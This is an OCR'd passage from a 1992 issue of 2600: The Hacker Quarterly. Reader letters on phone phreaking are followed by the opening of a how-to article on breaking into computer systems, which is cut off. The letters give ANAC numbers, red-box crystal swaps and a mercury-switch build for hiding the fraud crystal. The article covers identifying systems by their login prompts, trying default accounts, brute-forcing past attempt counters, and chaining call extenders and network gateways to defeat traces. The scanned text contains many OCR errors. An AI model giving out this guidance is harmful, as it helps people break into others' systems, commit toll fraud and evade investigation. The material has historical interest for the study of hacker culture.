  1397.  
  1398.     Future writers: this is what the people want!
  1399.  
  1400. A Phone Mystery
  1401. Dear 2600:
  1402.     I just started reading your wonderful periodical two issues ago. I saw
  1403. your Autumn 1991 issue at a local bookstore here in town. I picked up the
  1404. magazine and was very excited. You see, l have been BBSing for a few years
  1405. now, and have always been interested in everything you guys cover. 
  1406.  
  1407.     I've got a story. My father used to use my current bedroom when I was
  1408. little as his office. When he moved into a real office he had the separate
  1409. line for the room disconnected. Soon after, I moved into the room. I didn't
  1410. pay much attention to the outlet in my room because I thought it was just
  1411. hooked up to the main house line. About eleven years after we got the line
  1412. disconnected, I decided to see if it worked. I called a friend and was
  1413. excited. I thought to myself I could now have a phone in my room. I then
  1414. called my house line and it wasn't busy. My mother picked up the line and we
  1415. talked for a while. 
  1416.  
  1417.     From what I could tell, Ma Bell just forgot to unplug the line and never
  1418. charged us for it. This was all before I knew any better and before I got into
  1419. hacking. 
  1420.  
  1421.     Then one day I picked up the phone to call a friend and there was a guy on
  1422. the line. I didn't say anything until I think he said something to the effect
  1423. of "Jeff, is that you?"     replied back that I wasn't Jeff and hung up. I was
  1424. kinda scared to use the line for a while, but a few weeks later I really had
  1425. to get ahold of somebody and my sister was on the house line. I picked up the
  1426. phone in my room and there was that same guy on it. I never got a chance to
  1427. use the line again because a few months later my parents gave me a phone line
  1428. for me to use in my room. When the new line was all hooked up the old line
  1429. wouldn't work. I didn't think about it all that much until recently.
  1430.  
  1431.     My question is, does this happen a lot? I mean is Ma Bell really so big
  1432. that they can forget about a line for over a decade? If I was older, or if I
  1433. knew any better, I could have really raised some major hell.
  1434.                 The Psychedellc Sloth
  1435.                 Oregon
  1436.  
  1437.     This kind of thing happens all the time. In fact, odds are if you move
  1438.     into a new house and plug in a phone, you'll be connected to someone else's
  1439.     line. That is what happened to you. Your old line was disconnected. The
  1440.     phone company does not "forget" about phone numbers for ten years. What
  1441.     they do instead is hook wires (cable pairs) together at a junction box,
  1442.     serving area interface, or the frame itself so that the same line shows up
  1443.     in two different places. Why? Because they make lots of mistakes. It's
  1444.     happened here at 2600 twice in the past few years. A good clue is when
  1445.     someone beats you to answering the phone when there's nobody else
  1446.     around. Or when you start getting messages for non-existent people on your
  1447.     answering maclune. Keep this in mind next time the phone company claims
  1448.     that you're responsible for anything dialed on your line. And remember
  1449.     that any conversation, wire or radio, can be easily monitored,
  1450.     accidentally or on purpose.
  1451.  
  1452. Info
  1453. Dear 2600:
  1454.     ANAC for 313 is 2002002002 - at least this works in most areas. Also 313
  1455. loops are usually xxx- 9996/xxx-9997.
  1456.                 Erreth Akbe/Energy!
  1457.  
  1458. Many Questions
  1459. Dear 2600:
  1460.     Four issues of 2600 and I still want more. I've never been more impressed
  1461. by a magazine. Keep up the good work!
  1462.  
  1463.     Here are a few questions that I'd appreciate an answer to:
  1464.  
  1465.     1) In the parts lists for the FM wireless transmitter and the FM telephone
  1466. transmitter, three parts listed aren't in the schematics. On page 44, C7 and
  1467. C8 (22pF and 1.0nF) and on page 45, C7 (22pF). Do these discrepancies affect
  1468. the functioning of either device? 
  1469.  
  1470.     2) What is the product number of the Radio Shack phone dialer? Is there
  1471. anything more to the construction of the red box than crystal swapping? If so,
  1472. what?
  1473.  
  1474.     3) I'm rather new to the hack/phreak scene. Could you recommend the years
  1475. of back issues with the most information on a) the Internet and b) phreaking?
  1476.  
  1477.     4) Can you recommend a good book to learn electronics from?
  1478.  
  1479.     5) Can you suggest magazines which offer information similar to that found
  1480. in 2600 and are ordered hardcopy through the mail as opposed to found on the
  1481. Net?
  1482.  
  1483.     6) I'm severely lacking in my knowledge of "boxes". I'd like an
  1484. explanation of each of the more common types - if not schematics as well. I
  1485. understand beige, red, black, and green boxes. But, for instance, what are the
  1486. advantages of a blue box? Is there a formula for deciding which crystals
  1487. should be used for which tones (3.58 for DTMF, 6.5536 for red box, 4.1521 for
  1488. green box)? Does it vary with the device you put the crystal in? Is there a
  1489. general schematic that can be used with different crystals to produce
  1490. dffferent tones ?
  1491.  
  1492.     7) A few years ago (before I bocame interested in hack/phreaking) I saw
  1493. part of a movie in which an oscilloscope (I think) was used to determine MAC
  1494. or some kind of ATh/[ codes while the machine processed transactions. Does
  1495. this process have any workability?
  1496.                 The Ronin
  1497.                 Pennsylvanla
  1498.  
  1499.     The monitoring devices should work if you follow the schematics; The Radio
  1500.     Shack model number for the tone dialer is 43-141 but it's now rumored to
  1501.     have been discontinued. There is no modification other than replacing the
  1502.     crystal.
  1503.  
  1504.     We've been publishing phreaking information throughout all of our issues.
  1505.     The frequency hasn't changed but the particulars certainly have. Internet
  1506.     news is more prevalent in our later issue.
  1507.  
  1508.     Some good books to learn electronics from: Basic Electronics Theory by
  1509.     Delton Horn, published by TAB Books; Forrest M. Mims III Engineer's
  1510.     Mini-Notebook series available at Radio Shack; Understanding Solid State
  1511.     Electronics, sold at Radio Shack. Manufacturers' data books are free
  1512.     (Motorola, etc.) and you can learn an awful lot from them. Try calling some
  1513.     toll free numbers and asking.
  1514.  
  1515.     If any good hacker magazines come our way, we'll print the information.
  1516.     Recently, it's been pretty dry. These numbers may help for DTMF: For a
  1517.     5089 chip, first row, crystal divided by 5152; second row, 4648; third
  1518.     row, 4200;fourth row, 3808;first column, 2968; second column, 2688; third
  1519.     column, 2408, fourth column, 2184.
  1520.  
  1521.     Finally, oscilloscopes are for measuring waveforms, and generally not for
  1522.     eavesdropping. It's also very likely that any signal from an ATM would be
  1523.     encrypted.
  1524.  
  1525. Dear 2600:.
  1526.     First of all, you have a great magazine so don't change a thing/However, I
  1527. just recently received a bunch of back issues, so pardon me if some of these
  1528. questions are outdated or have been answered already.
  1529.  
  1530.     1) How can I help 2600 grow (besides the obvious of sending you money)? I
  1531. would like to do some sort of volunteer work for you guys, but that may pose a
  1532. small problem since I live a few thousand miles from New York.
  1533.  
  1534.     2) Is E.T. considered an honorary phone phreak?
  1535.  
  1536.     3) What is the ANAC number for the 515 area code?
  1537.  
  1538.     4) What can you tell me about your cover artist (Holly Kaufman Spruch)?
  1539.  
  1540.     5) Please explain to me why it takes six weeks for you guys to process
  1541. orders for hack issues. It should only take about two weeks tops. And that's
  1542. third class mail. If I decide to shell out maybe $75 for back issues, then
  1543. I want the "invaluable" information (that I don't already know) as soon
  1544. as possible, and don't want to wait a month and a half for it! This is very
  1545. frustrating, and I would also like some other readers' opinions on this.
  1546.  
  1547.     6) I sympathize with Kevin Mitnick in the Summer '91 issue, In plain
  1548. English, he got shafted. I'm not saying that he's completely innocent, but
  1549. the authors of the book Cyberpunk did write unfairly about him.
  1550.     7) How about writing an article listing all of the known phreak boxes,
  1551. what they can do, and if they can be used today. List all of the major
  1552. ones like blue, red, green, and black boxes and then list the lesser known
  1553. ones like the gold, cheese, diverti, aqua, etc.
  1554.  
  1555.     8) Would it be possible to put together a big gathering of phreaks in some
  1556. unknown exchange like the "2111" conference in the October 1971 Esquire
  1557. article "Secrets of the Little Blue Box"? To me that is what phreaking is
  1558. all about - helping other phreaks. By the way, I do know that you can't use
  1559. a blue box to do this anymore, but you inventive folks should be able to
  1560. come up with something that would work. If you did this however, you would
  1561. have to tell phreaks about it through word of mouth, as I'm sure many
  1562. telco security personnel read your magazine.
  1563.  
  1564.     9) I really enjoyed the "Hacker Reading List" in the Winter '90 issue.
  1565. However, it was slightly incomplete - you forgot magazine articles. Below
  1566. is a small list of hacker/phreak related articles that I have come across.
  1567. A larger list is available at the back of the book Cyberpunk. Also, a very
  1568. good book that Dr. Williams left out of the book list is called The Phone
  1569. Book and the author is J. Edward Hyde. To find these, just go to your
  1570. local library and see if they have the hack issues. However, they might
  1571. not have them as far back as '72, so you will have to use their microfiche.
  1572. I personally found most of these at a college library.
  1573.  
  1574.     Esquire, October 1971, "Secrets of the Little Blue Box".
  1575.     Esquire, December 1990, "Terminal Delinquents".
  1576.     Ramparts, June 1972, "Regulating the Phone Company in Your Home".
  1577.     Ramparts, July 1972, "How the Phone Company Interrupted Our Service".
  1578.     Radio Electronics, November 1987, "The Blue Box and Ma Bell".
  1579.     L.A. Weekly, July 18-24 1980, "The Phone Art of Phone Phreaking".
  1580.     Rolling Stone, September 19 1991, "Samurai Hackers".
  1581.     Playboy, October 1972, "Take That, You Soulless S.O.B.".
  1582.     Oui, August 1973, "The Phone Phreaks' Last Stand".
  1583.     Time, March 6 1972, "Phoney Tunes".
  1584.                 Clark Kent
  1585.                 Ames, IA
  1586.  
  1587.     You don't have to be anywhere near us to help out. You can send us
  1588.     information, articles, and anything else that comes to mind. You can
  1589.     contribute to the discussion on our voice BBS and start other forums on
  1590.     hacking throughout the country. By letting people know there is a place
  1591.     for them to contribute, you'll be opening up a lot of minds that are just
  1592.     waiting to be liberated. It may not be quite that poetic but you get the
  1593.     idea. We don't talk about E.T., we will talk about the .515 ANAC when we
  1594.     find it, and we can't talk about Holly Kaufmun Spruch. We agree that back
  1595.     issue orders take too long und we've taken some steps to alleviate the
  1596.     situation, including luring people whose only concern in life is to speed
  1597.     the process. Keep in mind that it takes our bank up to three weeks to
  1598.     notify us if a check has bounced or is unacceptable for some other stupid
  1599.     reason. That's why we're not too keen on sending out back issues until
  1600.     we're sure we've actually gotten paid. We could send out cash orders quicker
  1601.     but then too many people would send cash in the mail, whuch is a pretty
  1602.     risky thing in itself. We're hoping for a maximum of three to four weeks
  1603.     from start to finish. Our authors and hopefully other readers have taken
  1604.     note of your other ideas. Thanks for the info.
  1605.  
  1606.  
  1607. An Opinion
  1608. Dear 2600:
  1609.     I was reading an article from an issue of 2600 called "How Phone Phreaks
  1610. Are Caught" and it gave me a lot of insight, and I thought I should contribute
  1611. some. On many "elite" BBS's they have many files on how not to get caught
  1612. phreaking and what precautions to take (including this file). Files like that
  1613. are what will keep some phreaks in the clear and out of trouble. Most files,
  1614. like "Phreaking Made E-Z" (fictitious file, but used just to illustrate my
  1615. point), just say, "Okay, at the prompt, just type in...." etc. But the
  1616. phreakers need to know all the theory behind it. 
  1617.  
  1618.     Also included in the file was some of the Spring edition of 2600, and it
  1619. had an article about a "crackdown". It's kinda scary, but very tme. I myself
  1620. am not too quick to let people know that "I phreak", and am extremely
  1621. reluctant to show anyone my files (in other words, I don't) on phreaking,
  1622. hacking, etc. 
  1623.  
  1624.     But crackdowns like this can help phreaks. It will make them so paranoid
  1625. that they will all band together and create tings of correspondence, banding
  1626. everyone together. 
  1627.  
  1628.     Violent actions, like what happened to Steve Jackson Games, are pretty
  1629. scary to think about. I mean, should I be worried if I send someone e-mail over
  1630. America Online, and mention h/p/a/v, or a "phreaking" term? It's things like
  1631. this that can spread from the E911 doc and such.
  1632.  
  1633.     Thanks for letting me voice my opinion and I'd also like to subscribe to
  1634. 2600, for it seems to be the only printed mag that actually tells the truth.
  1635.                 TC
  1636.                 Blauvelt, NY
  1637.  
  1638.     Don't be concerned about what you talk about in e-mail. The only thing you
  1639.     should really be worried abaut is submitting to hysteria, paranoia, ar
  1640.     self-censorship.
  1641.  
  1642.  
  1643. The Facts on ACD
  1644. Dear 2600:
  1645.     Thanks goes out to Dr. Abuse and the designer of the magnetic stripe card
  1646. copier (printed in the Summer 1991 issue). Another thanks goes out to the Mad
  1647. Scientist, whose article fmally encouraged me to mess around with my silver
  1648. box. While experimenting with it and the Automated Call Distributor on some
  1649. payphones in Boston, Massachusetts, I got some different results than the Mad
  1650. Scientist did. They are as follows:
  1651.  
  1652.     1: Ring toll test board/loud busy
  1653.     2: Tone side - loop (high)
  1654.     3: Loud busy
  1655.     4: Dead/loud busy
  1656.     5: Loud busy
  1657.     6: Dead
  1658.     7: Dead
  1659.     8: Doesn't trigger anything (pulsing dialtone continues)
  1660.     9: Doesn't trigger anything (pulsing dialtone continues)
  1661.     O: Tone blast (1000 hz)
  1662.     *: Doesn't trigger anything (pulsing dialtone continues)
  1663.     #: Doesn't trigger anything (pulsing dialtone continues)
  1664.  
  1665.     I was wondering what the real purpose of the ACD was, because the features
  1666. it can achieve don't seem greatly important. I have also experimented with the
  1667. other tones (A, B, and C), but have not acquired any information.
  1668.  
  1669.     Secondly, while travelling in Belgium and Amsterdam last summer, I came
  1670. across a few electronics stores and a bookstore which had many interesting
  1671. items. I picked up one dialer, which is about 2" by 2" square and a 1/4"
  1672. thick, which has the 0-9, *, #, and A,B,C,D tones, which is what I use for my
  1673. silver box. It cost the equivalent of about $15-$20 US currency. There were
  1674. also some other types of dialers there too, all small and compact. In case
  1675. anyone was interested in ordering one of these dialers (I recommend it, they
  1676. are great), it is called the 'TD-1000 Digitale Toonkiezer" by Betacom. Try
  1677. writing or calling there two places: 
  1678.  
  1679.     1 ) Teleworld Telecommunicatieshops
  1680.         Kinkerstrsat 66-68-70
  1681.         1053 DZ Amsterdam
  1682.         The Netherlands
  1683.         Phone: +31-20-6834001
  1684.  
  1685.     2)  S. A. Kevinco N.V.
  1686.         Rue du Marche aux Herbes - 4 - Grasmarkt
  1687.         Bruxelles 1000 Belgium
  1688.         +32-2-2187159
  1689.  
  1690.     Also, if you happen to go into Amsterdam, and want to pick up current and
  1691. back issues of Hack-Tic (learn Dutch just to read this publication, it's
  1692. great), 80 to either of the following bookstores: Athenaeum Nieuwscentmm,
  1693. Amsterdam; Athenaeum Boekhandel, Amsterdam, Haarlem.
  1694.  
  1695.     This next comment is in regards to the letter from Dr. Delam on page 25 of
  1696. the Spring 1992 issue. He commented about making a red box with a mercury
  1697. switch for "pig-proof" access to the 6.5536mhz and 3.57mhz crystals. To go
  1698. more in depth with that, I will explain some of a text file that Cybametik
  1699. wrote up a few months back on that topic. You will need two mercury switches,
  1700. preferably very small, so they will fit into the dialer casing. Connect one
  1701. lead of one of the mercury switches to one of the leads of the 3.57mhz
  1702. crystal, and the other existing leads to the two solder marks on the dialer PC
  1703. board (where the original 3.57mhz crystal existed). Next, connect one lead of
  1704. the other mercury switch to one lead of the 6.5536mhz crystal, and connect the
  1705. two unconnected leads to the two solder marks on the dialer PC board (there
  1706. should now be four leads on the two marks). Now, in order for the mercury
  1707. switch action to work, you have to make sure that the mercury switches are
  1708. facing opposite directions (vertically), so when you tum the dialer backwards,
  1709. one crystal should connect with the board, and when you tum it the other way,
  1710. the other crystal should connect. Well, I hope that cleared things up a bit in
  1711. the way of mercury switches. 
  1712.  
  1713.     And lastly, some ANACs are: Boston and surrounding areas: 200-xxx-1234,
  1714. 200-222-2222; N.W. Indiana: 410-4 (x12).
  1715.                 Kingpin
  1716.                 Brookline, MA
  1717.  
  1718.     With regards to the Automated Call Distributor, whenever you call
  1719.     directory assistance, you're actually dialing into a queueing system which
  1720.     is known as the ACD. This system is simply what determines who is free to
  1721.     pick up your call. By pressing the D key while they pick up, you enter a
  1722.     test mode on the ACD. It's not meant to be interesting or exciting to
  1723.     anyone outside of the phone company.
  1724.  
  1725.  
  1726. Cellular Mystery
  1727. Dear 2600:.
  1728.     I was wondering if yon could answer this question. Local telephone
  1729. people and our RCMP have been adding an E-Promchip to their cellular phones.
  1730. Generally they are added to a Techniphone (British brand ofcellular).  They
  1731. have been designed to accept the chip easily.  Everyone has gone hush-hush on
  1732. this. Can you tell me what practical applications can be done with it?
  1733.                 Nova Scotia
  1734.  
  1735.     It's probably for the purpose of changing the ESN (Electronic Serial
  1736.     Number) and the MIN (Mobile Identifcation Number). It could abo be an ANI
  1737.     of some sort so the dispatcher knows who's talking. Then again, it could
  1738.     be for speech encryption. The best way to see if it's the latter is to get
  1739.     the frequency (use a frequency counter) and listen in with a scanner. Good
  1740.     luck.
  1741.  
  1742.  
  1743. Call For Data
  1744. Dear 2600:
  1745.     Do you have any plans for doing a list of CNA's? Michigan (313) went
  1746. automated a while back. The number is 424-0900. A three-digit employee number
  1747. is required. When I was in Chicago md browsing through their ANAC's, I found
  1748. an interesting phenomenon. It returned a barst of DTMF. I didn't have a decoder
  1749. so I can't be sure what it meant. Finally, the demon dialer as advertised in
  1750. your Winter 1991 issue works great. C'est bon. Hell, c'est tres bon. I highly
  1751. recommend it. Expect an article soon on boxing out of foreign countries.
  1752.                 The Azure Mage
  1753.                 Somewhere in the Military
  1754.  
  1755.     When we get the info, we'll print it.
  1756.  
  1757.  
  1758. Call For Info
  1759. Dear 2600:
  1760.     I was reading an article in your summer edition and it talked about a
  1761. magazine called Mobile Computing. Could you please tell me how I can get in
  1762. touch with them?
  1763.                 JS
  1764.  
  1765.  
  1766.     We can't track down a number or address for them at the moment. But you
  1767.     should also look in Computer Shopper if you want it~ro on lap tops.
  1768.  
  1769.  
  1770. Call For Help
  1771. Dear 2600:
  1772.     I run a BBS for the disabled called DEN (Disabilities Electronic Network).
  1773. Until recently we had an 800 number accessing an eight line hunt group. It was
  1774. a very lively national bulletin board. Our 800 number is in limited service
  1775. indefinitely as a result of our loss of funding. This has been the cause of a
  1776. search for long distance services that our users would make use of to access
  1777. DEN. I found PC Pursuit by Sprint. PC Pursuit is a non-prime time service that
  1778. allows 90 hours per month for disabled people and 30 hours per month for non-
  1779. disabled people for $30. The service enables one to access many electronic
  1780. services during non-prime time hours and weekends while not changing your
  1781. present long distance provider. Are you, or anyone at 2600, aware of other
  1782. such low cost services? I'm desperate to find low cost access for our users.
  1783. We're a free service and it would be a shame if our phone companies' greed
  1784. affected our ability to deliver a service to the disabled community. 
  1785.                 New Jersey
  1786.  
  1787.  
  1788.     The call has gone out.
  1789.  
  1790. A Choke Tip
  1791. Dear 2600:
  1792.     In regards to the "choke line" discussion in relation to reaching radio
  1793. stations (2600, Spring 1992), I have found that dialing a carrier access code
  1794. prior to the phone number increases the chances of getting through to a radio
  1795. station. This does result in a long distance charge but it may be worth the
  1796. risk, if one desires the prize greatly enough. 
  1797.                 The Prophet
  1798.                 Canada
  1799.  
  1800.  
  1801. Mail Problems
  1802. Dear 2600:
  1803.     Due to the problems with non-delivered issues, I have decided not to renew
  1804. my subscription to 2600. I think I've averaged at least one missing issue per
  1805. year of my subscription. This is not pleasant, especially with a quarterly
  1806. publication. 
  1807.     I doubt this is due to any incompetence on your part, but rather because of
  1808. sticky-fingered postal employees. They see The Hacker Quarterly pass in front
  1809. of them and think "Hmmm, I think I'll read this during lunch..." and who knows
  1810. where the hell it winds up after that.  Playboy remedied this some time ago by
  1811. mailing the magazine in an opaque plastic bag with a transparent section for
  1812. the address label on the magazine itself. Also, the return address has only
  1813. the mailing address, no tell-tale "Playboy" logo screaming "Steal me!".
  1814.     I will continue to support your magazine through newsstand and back issue
  1815. sales (please make them available on an individual issue basis).
  1816.                 RD
  1817.                 Austin, TX
  1818.  
  1819.     This definitely should not be happening. We have been having more of a
  1820.     problem with damaged issues, missing issues, and envelopes ripped open
  1821.     than ever before. Overall, the post office has done an amazing job but
  1822.     we're very concerned with this recent plummet in competence and/or honesty.
  1823.     We hope our readers complain loudly if anything happens to their mail.
  1824.     It would help a lot if anybody sending a letter of complaint sent as a
  1825.     copy so we can present it to the postal people on our end. Rest assured
  1826.     this is a top priority matter for us. We'd rather not add packaging to the
  1827.     magazine, for both cost and ecological reasons. We're interested in
  1828.     hearing more feedback on this. With regards to our back issues, individual
  1829.     issues are available from 1988 on at a cost of $6.25 each ($7.50 overseas).
  1830.     1984 through 1987 are only available by year ($25, $30 overseas).
  1831.  
  1832.  
  1833. Comments From Abroad
  1834. Dear 2600:
  1835.     Like many others, I'd noticed your Postnet example didn't correspond with
  1836. your description, and I'm even more delighted to see your C code for printing
  1837. them (I only have to modify it to suit my computer).
  1838.  
  1839.     The "Gulf War Printer Virus" expresses pretty much my reaction - that is,
  1840. it wouldn't work! Unlike your anonymous writer, I expressed this opinion on
  1841. the Intemet and received some interesting information in January. Although
  1842. most newspapers and computer magazines credited the original article to the
  1843. Wall Street Journal, it appears the "real" original article was in InfoWorld in
  1844. the April 1, 1991.issuel We need not ascribe to the nefarious operations of
  1845. the NSA what can be adequately blamed on the idiocy of certain reporters.
  1846.  
  1847.     On the other hand, could a "printer virus" slow down a computer? I'd
  1848. imagine it could, provided the computer was something relatively slow, like an
  1849. IBM XT or possibly AT. It all really depends on how they treat their parallel
  1850. printer port. If they generate interrupts upon receipt of a printer
  1851. acknowledge signal, then you merely need to rig the printer to blast the
  1852. acknowledge line at, say, 30 kilohertz. This would probably keep most CPUs
  1853. fairly busy, and slow down the performance nicely.
  1854.                 EL
  1855.                 Faulconbrldge, Australia
  1856.  
  1857.  
  1858. Dear 2600:
  1859.     We just heard about your mag and think it's a wonderful idea - finally a
  1860. means by which we chip-heads can get in touch without spending loads of money
  1861. on phone bills. See, we got much electronic shit to denounce even here in the
  1862. ole continent, without mentioning the fucking growing corporate trash and the
  1863. expanding neo-nazi movement. 
  1864.  
  1865.     But we ain't much organized over here; that's why we need you guys to give
  1866. us a starting point. We'll go on from there. We ain't many either - but we
  1867. dunno how many are on the biz, became it's quite difficult to find 'em all -
  1868. but a steadily growing number anyway. We wish you a most "productive" work. 
  1869.                 DF
  1870.                 Milan Italy
  1871.  
  1872. BBS Update
  1873. Dear 2600:
  1874.     I am the sysop of the Tin Shack BBS at (818) 992- 3321. I have an ad in
  1875. the Spring 1992 edition offering free elite access to all 2600 readers. I would
  1876. like to thank you for publishing this ad and I'd like to thank the many
  1877. hackers who are calling our BBS. I have enjoyed the CHATs and messages from
  1878. your readers. We are starting an exclusive hackers conference and including a
  1879. hackers filebase in this conference for sharing of code and text on the fine
  1880. art of hacking that has continued to enhance the science of computing. We have
  1881. also attracted the attention of a law enforcement agency from New York. This
  1882. was easily detected as they were shying away from caller verification and then
  1883. stupidly sending me a check for Elite Access paid out by their operating
  1884. account of their home office. What a deal! Since we know our rights and hold
  1885. no illegal wares I publicly thank them for helping us to buy new hardware!
  1886. Hahaha! The message base in our new hackers conference will be current and
  1887. quite interesting. If you are a real hacker, give us a call. No wannabes,
  1888. phonies, or pheds allowed on the Tin Shack BBS.
  1889.                 Guy Nohrenberg
  1890.                 Sysop
  1891.                 Tin Shack BBS
  1892.                 (818) 992-3321
  1893.  
  1894.     If you're promoting free speech and aren't doing anything illegal, there's
  1895.     no reason to disallow anyone.
  1896.  
  1897. Voice Mail Question
  1898. Dear 2600:
  1899.     How come your voice BBS is only open after 11 pm? Also, why do you give
  1900. out an expensive 0-700 number instead of a real phone number?
  1901.                 Puzzled
  1902.  
  1903.     First off, the 0-700 number costs 15 cents a minute. A regular phone
  1904.     number would cost 13 cents a minute. While slightly more, this is not
  1905.     comparable to a 900 number or anything of that natare. We give out that
  1906.     number because right now the system doesn't have a set phone number; it
  1907.     sometimes shows up on different lines. It's only available at night
  1908.     because it's currently a single-line system and opening the BBS during the
  1909.     day would tie up the voice mail functions. Right now we're working on
  1910.     expanding the system so that it shows up on our main number (516-751-
  1911.     2600) and so that the BBS part is available around the clock with multiple
  1912.     lines. To do this, we need to find some flexible multi-line voice mail
  1913.     software along with some cheap computers. If anyone has any suggestions,
  1914.     please send them our way. For now. the voice BBS can be reached through AT&T
  1915.     at 0-700-751-2600. Most of our writers can be reached through the voice
  1916.     mail section of that number, which is available 24 hours a day. During
  1917.     business hours, the rate of the 0-700 number is 25 cents a minute. (Don't
  1918.     worry, we're not making a penny off of this!)
  1919.  
  1920.  
  1921.  
  1922.       ------------------------------------------------------------------
  1923.  
  1924.  
  1925.                      2600 NOW HAS A VOICE BBS THAT OPERATES
  1926.                     EVERY NIGHT BEGINNING AT 11:00 PM EASTERN
  1927.                    TIME. FOR THOSE OF YOU THAT CAN'T MAKE IT TO
  1928.                    THE MEETINGS, THIS IS A GREAT WAY TO STAY IN
  1929.                        TOUCH. CALL 0700-751-2600 USING AT&T.
  1930.                    (IF YOU DON'T HAVE AT&T AS YOUR LONG DISTANCE
  1931.                    COMPANY, PRECEDE THE ABOVE NUMBER WITH 10288).
  1932.                  THE CALL COSTS 15 CENTS A MINUTE AND IT ALL GOES
  1933.                   TO AT&T. YOU CAN ALSO LEAVE MESSAGES FOR 2600
  1934.                     WRITERS AND STAFF PEOPLE AROUND THE CLOCK.
  1935.  
  1936.  
  1937.       ------------------------------------------------------------------
  1938.  
  1939.  
  1940.                          hacking on the front line
  1941.                                by AI Capone
  1942.  
  1943.     As we have seen from previous raids/busts, the consequences of being
  1944. caught by the federal govemment, etc. are not worth it in the long run. If
  1945. they cannot cripple you physically, then they will do it emotionally or
  1946. financially. Therefore I do not recommend that any action taken to gain
  1947. unauthorized access is justifiable in any way. However the choice is yours.
  1948.  
  1949.     People who desire to get into a "secure" system should know a few things
  1950. about it. First off. for me the word "secure" brings to mind a picture of a
  1951. human monitoring a system for 24 hours. All the nodes are watched
  1952. individually, and everything is hardcopied. This is obviously, in most (if not
  1953. all) cases, not feasible, as the man hours and/or the cash funding is non-
  1954. existent. Besides, to a system operator, watching everything a system does
  1955. could be quite boring. The hacker can capitalize on this.
  1956.  
  1957.     The two things a hacker should know about when attempting to gain access
  1958. to a system are:
  1959.  
  1960.     1. Typical formats for the system. (i.e. how you type in the login
  1961. sequence. Is the login and password on one continuous line, do you have to
  1962. type it in separately at different prompts, etc.)
  1963.  
  1964.     2. Default and common passwords. Default accounts are the accounts that
  1965. come with the system when it is installed ("factory accounts"). Common
  1966. accounts are accounts set up by the system operator for particular tasks. The
  1967. probability exists that these accounts are present on the system that the
  1968. hacker is trying to penetrate, therefore they should be tried.
  1969.  
  1970.                        Identifying the System
  1971.     If the owner of the system is not mentioned in the opening banner, you will
  1972. either have to gain access to the system itself or use CNA (Customer Name and
  1973. Address - the little thing that exists for identifying a telephone number).
  1974. Please remember that a brute force method on some systems is often recorded to
  1975. the account indicating the number of attempts that you have tried, sometimes
  1976. even writing the password that you've tried. More often than not, it will just
  1977. record the number of failed attempts. Aside from this, the system may "sound
  1978. an alarm". This is not a bell or siren that goes off; it is just a message
  1979. printed out and/or sent to any terminals designated as security operator
  1980. terminals (i.e. VMS). Example: 
  1981.  
  1982. Welcome to Sphincter Systems Vax Cluster
  1983. Username: CHEESEHEAD
  1984. Password:
  1985.  
  1986. Welcome to Sphincter Systems, Mr. Mouse
  1987. Number of failed attempts since last entry: 227
  1988.  
  1989.     Obviously, in the above example, Mr. Mouse would get the idea that someone
  1990. was attempting to gain access to his account and would promptly change the
  1991. password, assuming he was paying attention at login (Many people don't.
  1992. Logging into my favorite BBS, I have often left the room while my auto-login
  1993. macro was accessing the system. The same principle applies here.) Also, in the
  1994. above example, it was very stupid for Sphincter Systems to display the banner
  1995. identifying the system. This would only encourage the hacker in an attempt to
  1996. gain access (it always encouraged me), and at 227 attempts, the hacker should
  1997. have kept trying to gain access. Remember that once the account is accessed
  1998. correctly, the security counter is reset to zero and Mr. Mouse will probably
  1999. never know that someone else has his password (as long as no malicious or
  2000. destructive actions are carried out-and as long as he doesn't keep a record
  2001. of his login dates).
  2002.  
  2003.     When I was scanning a network, I often found that most of the systems
  2004. identified themselves. On the other hand, the systems I found in most
  2005. telephone exchanges required that they be identified by other means. The
  2006. banner usually decided my interest in the system, whether I just wanted to
  2007. try a few things and move on, or really concentrate on the effort. It also
  2008. gave me a little extra ammunition since usernames and/or passwords may contain
  2009. some information which was displayed in the banner. Another thing I noticed
  2010. about networks that differed from local dial-in systems was that dial-in
  2011. systems would disconnect me after three to five attempts. Granted, the system
  2012. on the network would disconnect me, but only from the host. The network itself
  2013. would not, creating one less problem to deal with. System operators might
  2014. suspect something if they saw an outdial number being accessed every thirty
  2015. seconds or so. 
  2016.  
  2017. Login:
  2018. Password:
  2019. (This is a Unix.)
  2020.  
  2021. Username:
  2022. Password:
  2023. (This is a VMS.)
  2024.  
  2025. @
  2026. (This is a Tops-20.)
  2027.  
  2028. Enter Usercode/Password
  2029. (This is a Burroughs.)
  2030.  
  2031. MCR]
  2032. (This is an RSX-11.)
  2033.  
  2034. ER!
  2035. (This is a Prime.)
  2036.  
  2037. .
  2038. (This is an IBM running a VM operating system.)
  2039.  
  2040.     This list is by far not complete, as there are many more systems out
  2041. there, but it will get you started. Some of the time, it will tell you the
  2042. name in the opening. Crays, for example, usually identify themselves.
  2043.  
  2044.                            The Telephone
  2045.     Make sure when you are dialing into the system that you realize that
  2046. somewhere along the trail there is a possibility of a trace. With all of the
  2047. switching systems in effect by Bell, etc. what you need to do is dial in using
  2048. an outside source. For instance, what I usually did was call an 800 extender
  2049. (not in Feature Group D), and then call the target system. The only times I
  2050. called the target system direct was when I was identifying the system (I did
  2051. not start hacking the system at this time), but even this is not recommended
  2052. these days. Things owned by Bell, such as COSMOS systems, SCCS networks, etc.,
  2053. are probably more risky than generic corporate systems. Of course using only
  2054. one extender should be the least of what you can do. If you call several
  2055. extenders and then the target system, the chances are that tracing the call
  2056. back to you will be next to impossible. But this method also is risky since
  2057. the long distance telephone company may not be overly enthused about you
  2058. defrauding them. At one time an acquaintance was harassing a company that was
  2059. tracing him. They let him know of the trace and just for the hell of it he
  2060. decided to stay on the line to see the results. The result was Paris, France.
  2061. Keep in mind he lives in the United States. This story displays an excellent
  2062. use of extenders. The only detriment I see is that by routing your call
  2063. through two or more extenders the integrity of the line decreases. 
  2064.  
  2065.     When using networks (Telenet, Tymenet, etc.) in connecting to the system,
  2066. your port is sent as an ID in order to accept your connection attempt. It
  2067. would really be simple then to isolate your number (providing you called the
  2068. network directly from your house) if you repeatedly attempt to use the system.
  2069. What you should do for this problem is loop through a gateway on the network.
  2070. The gateway is essentially an outdial which will connect to a system. Use the
  2071. gateway to call another network's dialup.
  2072.  
  2073.                              Common Passwords
  2074.     The following is a list of common passwords for various systems. On a
  2075. respectable system, these will be constantly changed. But not all system
  2076. managers are smart or security conscious. The first system that I got into was
  2077. by using a common account (no password was needed in this case, just the Unix
  2078. "uucp" as a username). Sometimes systems are put up and completely left alone.
  2079. It seems the managers think that nobody will find the system. In my case, the
  2080. system was kept current, and I had "uucp" privileges to the School Board
  2081. computer. Remember, as long as you don't do anything that damages or destroys
